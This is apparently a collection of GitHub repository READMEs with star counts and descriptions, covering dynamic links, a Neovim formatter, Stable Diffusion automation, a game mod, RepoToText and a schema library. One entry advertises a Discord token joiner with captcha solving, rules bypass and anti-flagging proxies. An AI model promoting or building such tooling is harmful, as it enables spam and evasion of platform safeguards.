# Dynamic Link Handler ![Join Discord](https://img.shields.io/discord/564160730845151244) ## **Pre-release Notice** This function depends on Appwrite 1.4. Please note that, as of the writing of this document, this version of Appwrite is not publicly available. ## Overview Dynamic links are links that redirect users to different locations based on their device, operating system, or other factors. For example, a link to a mobile app can redirect users to the Google Play Store or Apple App Store depending on their device. Dynamic links can also be used to redirect users to deep links - a specific page within a mobile app, such as a user profile page. ### Web https://github.com/appwrite/dynamic-links/assets/29069505/209bc34e-6a43-476c-b2f0-697bab2c54de ### iOS https://github.com/appwrite/dynamic-links/assets/29069505/7cac33ad-acc0-406f-9dae-c1d0359dd356 ### Android https://github.com/appwrite/dynamic-links/assets/29069505/72af1583-9e8c-4798-bbd6-40706ab8d40e ## Configuration The service can be configured through the `CONFIG` environment variable in a JSON string format. Each object in the `CONFIG` array is expected to have a `path` and `targets`. To illustrate, here are example settings for the `CONFIG` environment variable with respective use cases: ### 1. Mobile vs. Desktop Redirection ```json [ { "path": "/test", "targets": { "mobile": "https://m.example.com/test", "desktop": "https://www.example.com/test", "default": "https://www.example.com/test" } } ] ``` In this example, requests to the `/test` path will redirect mobile users to `https://m.example.com/test`, while desktop users are redirected to `https://www.example.com/test`. Users with unrecognized or non-classified user-agents will be directed to the default URL `https://www.example.com/test`. ### 2. Operating System-Specific Redirection ```json [ { "path": "/app", "targets": { "android": "https://play.google.com/store/apps/details?id=com.example", "ios": "https://apps.apple.com/app/example/id123456", "default": "https://www.example.com/app" } } ] ``` In this scenario, requests to the `/app` path will redirect Android users to the Google Play store and iOS users to the Apple App Store, while all other users are directed to the general application page. ### 3. Deep Link Redirection with Fallback Option ```json [ { "path": "/deeplink", "targets": { "android": { "appName": "twitter", "appPackage": "com.twitter.android", "appPath": "user?screen_name=appwrite", "fallback": "https://play.google.com/store/apps/details?id=com.twitter.android" }, "ios": { "appName": "twitter", "appPath": "user?screen_name=appwrite", "fallback": "https://apps.apple.com/us/app/twitter/id333903271" }, "default": "https://twitter.com/appwrite" } } ] ``` In this case, requests to the `/deeplink` path will redirect Android and iOS users to a specific part of an app, if installed. If the app is not installed (the deep link fails), they will be directed to their respective app stores. All other users will be redirected to a webpage containing similar information.
## Setting Up Deep Links ### Android For Android, add the following to your `AndroidManifest.xml`: ```xml <activity android:name="com.example.MainActivity" android:label="@string/app_name" android:launchMode="singleTask" android:theme="@style/AppTheme.NoActionBar"> <intent-filter android:label="@string/app_name"> <action android:name="android.intent.action.VIEW" /> <category android:name="android.intent.category.DEFAULT" /> <category android:name="android.intent.category.BROWSABLE" /> <!-- Accepts URIs that begin with YOUR_SCHEME://YOUR_HOST --> <data android:host="YOUR_HOST" android:scheme="YOUR_SCHEME" /> </intent-filter> </activity> ``` Also, add the following to your `MainActivity.java`: ```java @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); // Get the intent that started this activity Intent intent = getIntent(); Uri data = intent.getData(); // Verify that the intent has the correct action and data if (Intent.ACTION_VIEW.equals(intent.getAction()) && data != null) { String path = data.getPath(); String query = data.getQuery(); String screenName = query.substring(query.indexOf("=") + 1); String url = "https://twitter.com/" + screenName; // Redirect to the correct screen Intent redirect = new Intent(Intent.ACTION_VIEW, Uri.parse(url)); startActivity(redirect); } } ``` More information on deep linking for Android can be found [on the Android Developers website](https://developer.android.com/training/app-links/deep-linking). ### iOS For iOS, add the following to your `Info.plist` file: ```xml <array> <dict> <key>CFBundleURLSchemes</key> <array> <string>YOUR_SCHEME</string> </array> <key>CFBundleURLName</key> <string>YOUR_HOST</string> </dict> </array> ``` Also, in your `AppDelegate.swift` file, add the following to handle deep links: ```swift func application(_ application: UIApplication, continue userActivity: NSUserActivity, restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool { guard userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL, let components = NSURLComponents(url: url, resolvingAgainstBaseURL: true), let query = components.query, let separatorIndex = query.firstIndex(of: "=") else { return false } // Extract the screen name from the query string (everything after "=") let screenName = String(query[query.index(after: separatorIndex)...]) let profileUrl = "https://twitter.com/\(screenName)" // Redirect to the correct screen if let profile = URL(string: profileUrl) { let svc = SFSafariViewController(url: profile) self.window?.rootViewController?.present(svc, animated: true, completion: nil) } return true } ``` For further details on deep linking in iOS, refer to [Apple's official documentation](https://developer.apple.com/documentation/uikit/inter-process_communication/allowing_apps_and_websites_to_link_to_your_content). ## License This project is licensed under The MIT License (MIT). For more information, visit [http://www.opensource.org/licenses/mit-license.php](http://www.opensource.org/licenses/mit-license.php).
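To make the `CONFIG`-driven behaviour above concrete, here is a minimal Python sketch of resolving a redirect target from a config entry by user agent; it is illustrative only and not the function's actual code, whose platform detection and deep-link fallback handling are more involved.

```python
# Sketch of resolving a redirect target from a CONFIG entry based on the
# request's User-Agent (illustrative only; not the Appwrite function's code).
import json

CONFIG = json.loads("""
[
  {
    "path": "/app",
    "targets": {
      "android": "https://play.google.com/store/apps/details?id=com.example",
      "ios": "https://apps.apple.com/app/example/id123456",
      "default": "https://www.example.com/app"
    }
  }
]
""")


def resolve(path: str, user_agent: str) -> str | None:
    ua = user_agent.lower()
    if "android" in ua:
        platform = "android"
    elif "iphone" in ua or "ipad" in ua:
        platform = "ios"
    else:
        platform = "default"
    for rule in CONFIG:
        if rule["path"] == path:
            targets = rule["targets"]
            return targets.get(platform, targets["default"])
    return None


print(resolve("/app", "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X)"))
# -> https://apps.apple.com/app/example/id123456
```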
44
0
niuiic/format.nvim
https://github.com/niuiic/format.nvim
An asynchronous, multitasking, and highly configurable formatting plugin.
# format.nvim An asynchronous, multitasking, and highly configurable formatting plugin. ## Dependencies - [niuiic/core.nvim](https://github.com/niuiic/core.nvim) ## Features ### Format entire file Call `require("format").format()`. The plugin only modifies changed parts, so the buffer's folding, highlighting, etc. will not be affected. ### Format range Call `require("format").format_range()`. Only formats the selected area. Only works in `v` mode, not `V` or `C-v`. <img src="https://github.com/niuiic/assets/blob/main/format.nvim/format-range.gif" /> ### Multitasking 1. What is multitasking? It means you can use more than one tool to "format" code at a time. 2. Why do you need this feature? The most common need: if you are writing js/ts, `prettier` may cause an eslint error; if `eslint fix` is called after `prettier`, everything goes well. ## How it works 1. Copy buffer content into a temp file. 2. Apply commands to this file. 3. Read the file and write back to the buffer. 4. Remove the file. > Why create a temp file? > > This plugin is designed to apply various commands to the buffer. Some commands, like `cargo fix`, cannot work if the file does not exist. ## Config See builtins at `lua/format/builtins`. > There are not many builtins, but you can add your favorite formatting tools easily, as long as you know how to format files with the command line. The default configuration is below. > See the full configuration in `lua/format/static.lua` ```lua require("format").setup({ allow_update_if_buf_changed = false, -- function to calculate path of the temp file temp_file = function(file_path) local core = require("core") local new_file_path = core.file.dir(file_path) .. "/_" .. core.file.name(file_path) .. "." .. core.file.extension(file_path) return new_file_path end, hooks = { ---@type fun(code: integer, signal: integer) | nil on_success = function() vim.notify("Formatting Succeed", vim.log.levels.INFO, { title = "Format" }) end, ---@type fun(err: string | nil, data: string | nil) | nil on_err = function() vim.notify("Formatting Failed", vim.log.levels.ERROR, { title = "Format" }) end, on_timeout = function() vim.notify("Formatting Timeout", vim.log.levels.ERROR, { title = "Format" }) end, }, filetypes = { -- see format configuration below lua = require("format.builtins.stylua"), rust = require("format.builtins.rustfmt"), javascript = require("format.builtins.prettier"), typescript = require("format.builtins.prettier"), -- ... }, }) ``` A format configuration sample follows. > You can debug your configuration with the `on_err` option.
```lua javascript = function(file_path) return { -- the first task ---@class format.config ---@field cmd string ---@field args string[] ---@field options {env?: table<string, any>, cwd?: string, uid?: number, gid?: number, verbatim?: boolean, detached?: boolean, hide?: boolean, timeout?: number} | nil ---@field on_success fun(code: integer, signal: integer) | nil ---@field on_err fun(err: string | nil, data: string | nil) | nil ---@field ignore_err (fun(err: string | nil, data: string | nil): boolean) | nil { cmd = "prettier", args = { -- this plugin copies content of current buffer to a temporary file, and format this file, then write back to the buffer, thus, you need to make sure the formatter can write to the file "-w", file_path, }, -- some formatters may output to stderr when formatted successfully, use this function to ignore these errors ignore_err = function(err, data) return err == nil and data == nil end, }, -- the second task { cmd = "eslint", args = { "--fix", file_path, }, -- just try to fix error with eslint, ignore the errors whether it succeed or not ignore_err = function() return true end, -- only the last task's `on_success` works -- all tasks's `on_err` works on_success = function() print("format success") end, }, } end ``` ## Example to use with lsp format This plugin has no lsp formatting feature built in. You can configure it like this to use both formatting functions at the same time. ```lua local filetypes_use_lsp_format = { "c", "cpp", } local format = function() local core = require("core") if core.lua.list.includes(filetypes_use_lsp_format, function(filetype) return filetype == vim.bo.filetype end) then vim.lsp.buf.format() else require("format").format() end end ```
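The "How it works" section above (copy the buffer to a temp file, run the formatter commands against it, read the result back, delete the file) can be illustrated with a short standalone sketch. Python and the `stylua` command are used here purely for illustration and are assumptions; the plugin itself is written in Lua and operates on Neovim buffers.

```python
# Standalone illustration of the temp-file pipeline described above: copy the
# text to a temp file, run formatter commands against it, read it back, then
# delete it. Not the plugin's code; Python and stylua are illustrative choices.
import subprocess
import tempfile
from pathlib import Path


def format_text(text: str, commands: list[list[str]], suffix: str = ".lua") -> str:
    with tempfile.NamedTemporaryFile("w", suffix=suffix, delete=False) as tmp:
        tmp.write(text)
        tmp_path = Path(tmp.name)
    try:
        for cmd in commands:
            # Each command is expected to rewrite the file in place.
            subprocess.run(cmd + [str(tmp_path)], check=True, capture_output=True)
        return tmp_path.read_text()
    finally:
        tmp_path.unlink()


# Example (assumes stylua is installed):
# formatted = format_text("local x=1\n", [["stylua"]])
```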
25
1
ayushr6/sd-webui-automation
https://github.com/ayushr6/sd-webui-automation
Easily generate images from a dataset/list of prompts using the automation script for the Stable Diffusion web UI.
# Automatic1111-webui Automation A `python automated script` to automate [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui), easing the task of generating thousands of images in one go with the help of `csv` files. ## Step 1 - Clone: - for HTTPS: ``` git clone https://github.com/AUTOMATIC1111/stable-diffusion-webui.git ``` - for SSH: ``` git clone git@github.com:AUTOMATIC1111/stable-diffusion-webui.git ``` ## Step 2 - Installation and Running: Follow the steps provided in the [README](https://github.com/AUTOMATIC1111/stable-diffusion-webui/blob/master/README.md) to install and run `AUTOMATIC1111 - stable diffusion webui` Note 1: After successful installation, run the webui with the `api` flag, as follows:- ``` bash webui.sh --api ``` Note 2: After successfully running the webui, note down the `URL` at which the webui is running. e.g. Running on local URL: http://127.0.0.1:7860 #### Important: Do not close or exit the terminal in which sd-webui is running ## Step 3 - Clone this repo (in another terminal) - for HTTPS: ``` git clone https://github.com/ayushr6/sd-webui-automation.git ``` - for SSH: ``` git clone git@github.com:ayushr6/sd-webui-automation.git ``` ## Step 4 - Install required Libraries - cd into `sd-webui-automation` and run: ``` pip install -r requirements.txt ``` ## Step 5 - Setup and Running Script #### To list all available models on your end, run the following command: ``` python generate_images.py print_available_models ``` ### There are two ways through which you can generate images: #### 1. using `two csv` files: - the first contains the unique names of actors, items, animals, etc. - the second contains `prompts` with a placeholder that can be `replaced by` the name of a character, item, animal, etc. from the first csv. Note:- The second `csv` must also contain the following parameters, `replace_with`, `model_name`, `sampling_method`, `sampling_steps`, `cfg_scale`, and `batch_count`. for e.g. ``` first - tiny cute #### toy, soft smooth lighting, soft pastel colors, 3d blender render second - tiger or camel or any other animal name prompt = tiny cute tiger toy, soft smooth lighting, soft pastel colors, 3d blender render ``` This is how we can use `two csvs` to generate images for a list of characters, animals, etc. and use different prompts for each keyword. #### Run: for webui: ``` python generate_images.py generate_images_from_two_csv --input_csv "input/animals.csv" --prompt_csv "input/animals_prompts.csv" --headless False --output_dir "output/animals" ``` for api: ``` python generate_images.py generate_images_from_two_csv --input_csv "input/animals.csv" --prompt_csv "input/animals_prompts.csv" --use api --output_dir "output/animals" ``` ### Parameters Parameter | Definition ------------------------- | ----------------------------------------------------- `--input_csv` | `path` to `input_csv` `--prompt_csv` | `path` to `prompt_csv` `--webui_url` | `url` at which `automatic1111-webui` is running `--model` | sd model name (e.g. sd-v1-4) `--output_dir` | path to output_dir `--sampling_method` | sampling method name (e.g. Euler a, DDIM, etc.) `--sampling_steps` | sampling steps (1 - 150) `--batch_count` | number of images in one batch (1 - 100) `--cfg_scale` | cfg scale (1 - 30) `--use` | accepted values (webui/api) `--headless` | run webui in headless mode? (True/False) `--add_on` | overwrite existing content or not (`True` / `False`) #### 2.
using a `single csv` file: - This file contains the prompts with respect to which we need to generate the images. Note:- This `csv` must also contain the following parameters, `replace_with`, `model_name`, `sampling_method`, `sampling_steps`, `cfg_scale`, and `batch_count`. for e.g. ``` prompt - tiny cute tiger toy, soft smooth lighting, soft pastel colors, 3d blender render ``` This is how we can use a `single csv` to generate images directly from a list of prompts. #### Run: for webui: ``` python generate_images.py generate_images_from_single_csv --prompt_csv "input/famous_structures.csv" --headless False --output_dir "output/famous_structures" ``` for api: ``` python generate_images.py generate_images_from_single_csv --prompt_csv "input/famous_structures.csv" --use api --output_dir "output/famous_structures" ``` ### Parameters Parameter | Definition ------------------------- | ----------------------------------------------------- `--prompt_csv` | `path` to `prompt_csv` `--webui_url` | `url` at which `automatic1111-webui` is running `--model` | sd model name (e.g. sd-v1-4) `--output_dir` | path to output_dir `--sampling_method` | sampling method name (e.g. Euler a, DDIM, etc.) `--sampling_steps` | sampling steps (1 - 150) `--batch_count` | number of images in one batch (1 - 100) `--cfg_scale` | cfg scale (1 - 30) `--use` | accepted values (webui/api) `--headless` | run webui in headless mode? (True/False) `--add_on` | overwrite existing content or not (`True` / `False`) `CFG Scale` : a parameter that controls how much the generated image matches the text prompt and/or the input image. A higher CFG scale value results in an output image more in line with the input prompt or image, but at the expense of quality. Conversely, a lower CFG scale value produces a better-quality image that may differ from the original prompt or image. `Sampling Method/Samplers` : Samplers are used to tell the AI how it should start generating visual patterns from the initial noise. NovelAI supports a wide variety of Sampling Methods: DPM++ 2M, Euler Ancestral, Euler, DPM2, DPM++ 2S Ancestral, DPM++ SDE, DPM Fast, and DDIM. (Note: Refer to the webui to see the list of all samplers) `Sampling Steps` : Sampling steps is the number of iterations that Stable Diffusion runs to go from random noise to a recognizable image based on the text prompt.
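A minimal Python sketch of the two-CSV combination step described above, replacing the `####` placeholder in each prompt template with each keyword; the column names used here are assumptions and may differ from the script's actual CSV layout.

```python
# Sketch of combining a keyword CSV with a prompt-template CSV, replacing the
# "####" placeholder as described above. Column names ("name", "prompt") are
# assumptions and may differ from the script's actual CSV layout.
import csv


def build_prompts(keywords_csv: str, prompts_csv: str) -> list[str]:
    with open(keywords_csv, newline="") as f:
        keywords = [row["name"] for row in csv.DictReader(f)]
    with open(prompts_csv, newline="") as f:
        templates = [row["prompt"] for row in csv.DictReader(f)]
    return [t.replace("####", kw) for kw in keywords for t in templates]


# e.g. keyword "tiger" + template "tiny cute #### toy, soft smooth lighting, ..."
# -> "tiny cute tiger toy, soft smooth lighting, ..."
```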
10
0
blu-dev/less-delay
https://github.com/blu-dev/less-delay
A mod for SSBU that removes 1 frame of input delay
# Less Input Delay This is a **software modification** to Super Smash Bros. Ultimate that removes 1 frame of input delay. This is performed by disabling graphical vsync and manually timing the game's core logic to run on the vsync timer. ## Installation You can install this by grabbing the latest `libless_delay.nro` file from this repository's Releases page and placing it here: `sd:/atmosphere/contents/01006A800016E000/romfs/skyline/plugins/libless_delay.nro` You will also need skyline, which you can find from basically any Ultimate modding tutorial. ## Pitfalls On some stages/some matchups/some characters, when the graphics pipeline is getting flooded with rendering commands, you **may** encounter purely visual frame drops. These frame drops, as I just said, are entirely visual. I have been playing with this for 3 weeks and have encountered absolutely zero noticeable frame drops. You **will** encounter some form of frame drops when recording or streaming using SysDVR/SysDVR-patches. These are unavoidable and can be reduced by dropping your recording framerate from 60fps -> 30fps or disabling them entirely. ## Wifi Safeness? This is a client side mod that changes the graphics pipeline in a very slight way. Because it is client side, this will work online in all capacities and offline in all capacities. I do not recommend using this to practice offline unless the tournaments that you go to are also running this mod because you'll quickly realize how much you hate that extra 1 frame (well maybe not in Ultimate's engine, but it's very noticeable in HDR which this was originally developed for). ## Visual indicator for wifi brackets? I didn't care this time around, there will be no visual indicator. It is indicated to me that Ultimate players do not care about online competitive integrity as there have been numerous forks of the original source code for my online arena latency slider that allow for disabling the arena UI text that says you have it. ## Enjoy playing a faster game!
30
0
H4cK3dR4Du/Discord-Token-Joiner
https://github.com/H4cK3dR4Du/Discord-Token-Joiner
The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)!
# Discord Token Joiner 🪐 The best token joiner for Discord, with captcha solver, rules bypass, and nickname changer (optional)! ## 📹 Preview https://github.com/H4cK3dR4Du/Crunchyroll-Account-Checker/assets/118562174/344619ae-883c-40bd-a805-297db331cd31 ## 🔥 Features - Fully Requests Based Joiner - Fastest Discord Token Joiner - HTTP & HTTPS Proxy Support - Multi Proxy Support - Captcha Solver - Nickname Changer - Bypass Rules - Doesn't Flag Any Token - Slick UI - Simple & Easy To Setup ## ✍️ Usage 1. Edit `proxies.txt` file and set your proxies 2. Edit `config.json` with your custom settings 3. Open `main.py` and enjoy! :) ## ⚠️ DISCLAIMER / NOTES This github repo is for EDUCATIONAL PURPOSES ONLY. I am NOT under any responsibility if a problem occurs. I have made this GitHub repository in just 2 hours. If there is any issue, please contact me through my Discord. ## ✨ Issues / Doubts - If you have any questions do not hesitate to enter my discord: https://discord.gg/hcuxjpSfkU - Or if you have any error do not forget to report it in: [issues](https://github.com/H4cK3dR4Du/Discord-Token-Joiner/issues/new)
14
2
JeremiahPetersen/RepoToText
https://github.com/JeremiahPetersen/RepoToText
Turn an entire GitHub Repo into a single organized .txt file to use with Code Interpreter
![example workflow](https://github.com/JeremiahPetersen/RepoToText/actions/workflows/pylint.yml/badge.svg) ![example workflow](https://github.com/JeremiahPetersen/RepoToText/actions/workflows/es-lint.yml/badge.svg) ![repo to text 5](https://github.com/JeremiahPetersen/RepoToText/assets/118206017/0d65016d-6388-48e0-b833-4ea1a169acfe) ![repo to text 7](https://github.com/JeremiahPetersen/RepoToText/assets/118206017/7d28fa8f-8bb1-4ddd-99f3-b33ddb26f0e9) ## RepoToText RepoToText is a web app that scrapes a GitHub repository and converts its files into a single organized .txt. It allows you to enter the URL of a GitHub repository and an optional documentation URL (the doc info will be appended to the top of the .txt). The app retrieves the contents of the repository, including all files and directories, and also fetches the documentation from the provided URL and includes it in a single organized text file. The .txt file will be saved in the root project directory with user/repo/timestamp info. This file can then be uploaded to Code Interpreter and you can use the chatbot to interact with the entire GitHub repo. Add your GitHub API Key in the .env file GITHUB_API_KEY='YOUR GITHUB API KEY HERE' ## Prompt Example This is a .txt file that represents an entire GitHub repository. The repository's individual files are separated by the sequence '''--- , followed by the file path, ending with ---. Each file's content begins immediately after its file path and extends until the next sequence of '''--- *Add your idea here (Example)*: Please create a react front end that will work with the back end ## FolderToText FolderToText.py is a script that allows you to turn a local folder, or local files, into a .txt in the same way RepoToText.py does. Choose your files with browse (you can continue adding by clicking "Browse"). Once you have all of your files selected and uploaded with browse, type in the file type endings you want to copy with a ',' in between. Example: .py , .js , .md , .ts ---> You can also turn this off and it will add every file you uploaded to the .txt ---> Last, enter the file name you want to appear and the output path. The file will be written with your file name choice and a timestamp. ## Info - creates a .txt with ('''---) separating each file from the repo. - each file from the repo has a header after ('''---) with the file path as the title - the .txt file is saved in the root directory - you can add a url to a doc page and the doc page will be appended to the top of the .txt file (great to use for tech that came out after Sep 2021) ## Tech Used - Frontend: React.js - Backend: Python Flask - GitHub API: PyGithub library - Additional Python libraries: beautifulsoup4, requests, flask_cors, retry ## Frontend The frontend of the app is implemented using React.js. The main component is `App.js`, which handles user input and interacts with the backend API. ### App.js This file defines the main React component of the app. It uses React hooks to manage the state of input fields and the response received from the backend. - `useState` hooks are used to define the state variables `repoUrl`, `docUrl`, and `response`, which hold the values of the repository URL, documentation URL, and the response from the backend API, respectively. - The component defines event handlers (`handleRepoChange`, `handleDocChange`, `handleSubmit`, and `handleCopyText`) to update the state variables based on user interactions. - When the user clicks the "Submit" button, the `handleSubmit` function is called.
It sends a POST request to the backend API using the Axios library, passing the `repoUrl` and `docUrl` values in the request body. The response from the API is then stored in the `response` state variable. - The component renders the input fields, buttons, and the output area using JSX. ## Backend The backend of the application is implemented using Python and the Flask web framework. The main script is `RepoToText.py`, which defines the Flask application and handles the scraping and conversion logic. ### RepoToText.py This file contains the Flask application and the `GithubRepoScraper` class responsible for scraping the GitHub repository and generating the text file. - The `GithubRepoScraper` class initializes with a GitHub API key and the repository URL. It provides methods to fetch all files from the repository, scrape documentation from a provided URL, write the files and documentation to a text file, and clean up the text file by removing unnecessary line breaks. - The Flask application is created using the `Flask` class and enables Cross-Origin Resource Sharing (CORS) using the `CORS` extension. It defines a single route `/scrape` that accepts POST requests. - When a POST request is received at the `/scrape` endpoint, the request data is extracted and the repository URL and documentation URL are retrieved. - An instance of `GithubRepoScraper` is created with the repository URL and documentation URL. - The `run` method of `GithubRepoScraper` is called, which fetches all files from the repository, writes them to a text file along with the documentation, and performs cleanup on the text file. - The generated text file is read and returned as the response of the API. ## Running the Application To run the application, follow these steps: 1. Install the required dependencies mentioned in the frontend and backend sections. 2. Start the backend server by running the `RepoToText.py` script. The Flask application will listen on port 5000. 3. Start the frontend development server by running the React application. 4. Access the application in a web browser and enter the GitHub repository URL and documentation URL (if available). 5. Choose All files or choose specific file types. 6. Click the "Submit" button to initiate the scraping process. The converted text will be displayed in the output area, and it will also be saved to the project root directory. 7. You can also click the "Copy Text" button to copy the generated text to the clipboard. ## TODO - [ ] FIX: Broken file types: .ipynb | - [ ] FIX: FolderToText - fix so a user can pick one folder (currently only working when user selects individual files - [ ] add in the ability to work with private repositories - [ ] create a small desktop app via PyQT or an executable file - [ ] add ability to store change history and update .txt to reflect working changes - [ ] add checker function to make sure .txt is current repo version - [ ] adjust UI for flow, including change textarea output width, adding file management and history UI - [ ] explore prompt ideas including breaking the prompts into discrete steps that nudge the model along
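Since the readme above specifies the output layout ('''--- followed by the file path, ending with ---, then the file content until the next marker), here is a minimal Python sketch that parses such a .txt back into a path-to-content mapping; it is an illustration based on that description, not part of RepoToText itself, and real output may have edge cases this regex misses.

```python
# Sketch of parsing a RepoToText-style .txt back into {path: content}. The
# delimiter format ('''--- <path> ---) follows the prompt example above; this
# is not code from the RepoToText project.
import re


def parse_repo_txt(text: str) -> dict[str, str]:
    files: dict[str, str] = {}
    # Each file starts with '''--- <path> --- and runs until the next marker.
    pattern = re.compile(
        r"'''---\s*(?P<path>.+?)\s*---\n(?P<body>.*?)(?=(?:'''---)|\Z)", re.S
    )
    for match in pattern.finditer(text):
        files[match.group("path")] = match.group("body").rstrip("\n")
    return files


sample = "'''--- src/app.py ---\nprint('hi')\n'''--- README.md ---\n# demo\n"
for path, body in parse_repo_txt(sample).items():
    print(path, "->", repr(body))
# src/app.py -> "print('hi')"
# README.md -> '# demo'
```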
61
6
fabiospampinato/skex
https://github.com/fabiospampinato/skex
A modern schema validation and filtration library with great TypeScript support.
# Skex A modern schema validation and filtration library with great TypeScript support. ## Install ```sh npm install --save skex ``` ## APIs | [Primitive Ops](#primitive-ops) | [Compound Ops](#compound-ops) | [Type Ops](#type-ops) | [Utilities](#utilities) | [Types](#types) | | ------------------------------- | ----------------------------- | --------------------- | ----------------------------- | ------------------- | | [`bigint`](#bigint) | [`array`](#array) | [`any`](#any) | [`serialize`](#serialize) | [`Infer`](#infer) | | [`boolean`](#boolean) | [`tuple`](#tuple) | [`unknown`](#unknown) | [`deserialize`](#deserialize) | [`Schema`](#schema) | | [`null`](#null) | [`object`](#object) | | | | | [`number`](#number) | [`record`](#record) | | | | | [`string`](#string) | [`nillable`](#nillable) | | | | | [`symbol`](#symbol) | [`nullable`](#nullable) | | | | | [`undefined`](#undefined) | [`optional`](#optional) | | | | | | [`and`](#and) | | | | | | [`or`](#or) | | | | ## Usage This library provides various operators, or "ops" for short, which are the building blocks used to construct a schema. A schema is a graph of operators, which are the nodes in this graph. Each operator has various chainable immutable APIs used to customize it, and it can have a default value and a description. The main methods that each operator has, which are also the main functionality of this library, are: - `test`: the test method basically uses a schema as a type guard, it tells you if an arbitrary value matches the schema structurally according to TypeScript, i.e. like in TypeScript extra properties are allowed as long as the type of the schema matches. The input value is not mutated in any way. - `filter`: the filter method basically tries to extract the biggest subset of the input value that matches the schema. For example imagine you have a schema for your app's settings, you want to get all the valid settings out of the object, but if there happens to be an invalid setting in the object that shouldn't cause the entire object to be considered invalid. Basically invalid properties are deleted from the input object until what remains is a valid object, or an error is thrown if that's not possible. The input object can be mutated, even if the call ultimately ends up throwing an error. - `traverse`: the traverse method allows you to do something for each operator node found traversing the given node. This is fairly powerful but a bit of a niche and escape-hatch kind of feature. 
Some basic examples: ```ts import {boolean, number, object, string} from 'skex'; // Let's create a simple schema that matches a number between 0 and 10 inclusive const schema1 = number ().min ( 0 ).max ( 10 ); // Schemas are immutable, they are cloned when made more specific schema1.multipleOf ( 5 ) !== schema1; // => true // Almost every operator supports all of the following APIs schema1.anyOf ([ 1, 2, 3 ]); // Allow only the provided values schema1.noneOf ([ 1, 2, 3 ]); // Disallow the provided values schema1.nillable (); // Allows for matching also null | undefined schema1.nullable (); // Allows for matching also null schema1.optional (); // Allows for matching also undefined schema1.default ( 123 ); // Sets a default value to fallback to when filtering and receiving an invalid input schema1.description ( 'Some description' ); // Set a description for this schema // Configuring multiple identical modifiers on the same schema is disallowed and will case the library to throw schema1.multipleOf ( 5 ).multipleOf ( 10 ); // => throws an error // The internal state of each operator can be retrieved schema1.get (); // => { min: 0, max: 10 } schema1.get ( 'min' ); // => 0 schema1.get ( 'max' ); // => 10 schema1.get ( 'multipleOf' ); // => undefined // Let's test if an arbitrary input matches this schema schema1.test ( 0 ); // => true schema1.test ( 5 ); // => true schema1.test ( 10 ); // => true schema1.test ( 100 ); // => false schema1.test ( -10 ); // => false schema1.test ( 'abc' ); // => false // Let's filter an input according to this schema, which for primitive ops effectively means throwing if the input doesn't match schema1.filter ( 0 ); // => 0 schema1.filter ( 5 ); // => 5 schema1.filter ( 10 ); // => 10 schema1.filter ( 100 ); // => throws an error schema1.filter ( -10 ); // => throws an error schema1.filter ( 'abc' ); // => throws an error // Let's filter the input according to the schema, like .filter, but without throwing, like .test const isFiltered = schema1.filter ( 10, false, true ); // Let's create a more complicated schema for matching settings // Notice how every property is also marked as optional, as we don't want to throw out the entire input object if a single one of these properties is missing or invalid const schema2 = object ({ editor: object ({ autosave: object ({ enabled: boolean ().default ( true ).description ( 'Whether autosaving is enabled or not' ).optional (), interval: number ().default ( 60_000 ).description ( 'The mount of time to wait between autosaves' ).optional () }).optional (), cursor: object ({ animated: boolean ().default ( false ).description ( 'Whether the cursor should move smoothly between positions or not' ).optional (), blinking: string ().anyOf ([ 'blink', 'smooth', 'phase', 'expand', 'solid' ]).default ( 'blink' ).description ( 'The style used for blinking cursors' ).optional (), style: string ().anyOf ([ 'line', 'block', 'underline' ]).default ( 'line' ).description ( 'The style used for rendering cursors' ).optional () }).optional () }).optional () }); // Let's match some objects against this more complicated schema schema2.test ( {} ); // => true schema2.test ({ // => true editor: { autosave: { enabled: true } } }); schema2.test ({ // => true editor: { cursor: { animated: true, blinking: 'phase', style: 'underline' } }, extraProperty: { whatever: true } }); schema2.test ({ // false editor: { cursor: { animated: 'nope' } } }); schema2.test ({ // false editor: { cursor: { blinking: 'no-blinking' } } }); // Let's filter an object against 
this more complicate schema const filtered = schema2.filter ({ editor: { cursor: { animated: true, blinking: 'phase', style: 'pixelated' } }, extraProperty: { whatever: true } }); // { // editor: { // cursor: { // animated: true, // blinking: 'phase' // } // } // } // Let's traverse this schema schema2.traverse ( ( child, parent, key ) => { console.log ( 'current node:', child ); // Callback called once for each operator node ("child" here) in the graph console.log ( 'parent node:', parent ); // All nodes have a parent except for the root one being traversed console.log ( 'parent key:', key ); // Some child nodes have a parent but they are not attached on a key on the parent, like schemas passed to the "and" operator }); ``` ## Primitive Ops Primitive operators are the leaf nodes in your schema graph, they don't take any other operators as input, they just match a single value. #### `bigint` This op matches a single [BigInt](https://developer.mozilla.org/en-US/docs/Glossary/BigInt). ```ts import {bigint} from 'skex'; bigint (); // Matches a bigint bigint ().gt ( 5n ); // Matches a bigint that is > 5n bigint ().gte ( 5n ); // Matches a bigint that is >= 5n bigint ().min ( 5n ); // Matches a bigint that is >= 5n bigint ().lt ( 5n ); // Matches a bigint that is < 5n bigint ().lte ( 5n ); // Matches a bigint that is <= 5n bigint ().max ( 5n ); // Matches a bigint that is <= 5n bigint ().multipleOf ( 5n ); // Matches a bigint that is a multiple of 5n bigint ().anyOf ([ 1n, 2n, 3n ]); // Matches a bigint that is either 1n, 2n or 3n bigint ().noneOf ([ 1n, 2n, 3n ]); // Matches a bigint that is neither 1n, 2n nor 3n bigint ().nillable (); // Matches bigint | null | undefined bigint ().nullable (); // Matches bigint | null bigint ().optional (); // Matches bigint | undefined ``` #### `boolean` This op matches a single [Boolean](https://developer.mozilla.org/en-US/docs/Glossary/Boolean). ```ts import {boolean} from 'skex'; boolean (); // Matches a boolean boolean ().anyOf ([ true ]); // Matches a boolean that is true boolean ().noneOf ([ true ]); // Matches a boolean that is not true boolean ().nillable (); // Matches boolean | null | undefined boolean ().nullable (); // Matches boolean | null boolean ().optional (); // Matches boolean | undefined ``` #### `null` This op matches a single [Null](https://developer.mozilla.org/en-US/docs/Glossary/Null). ```ts import {null} from 'skex'; null (); // Matches null null ().optional (); // Matches null | undefined ``` #### `number` This op matches a single [Number](https://developer.mozilla.org/en-US/docs/Glossary/Number). 
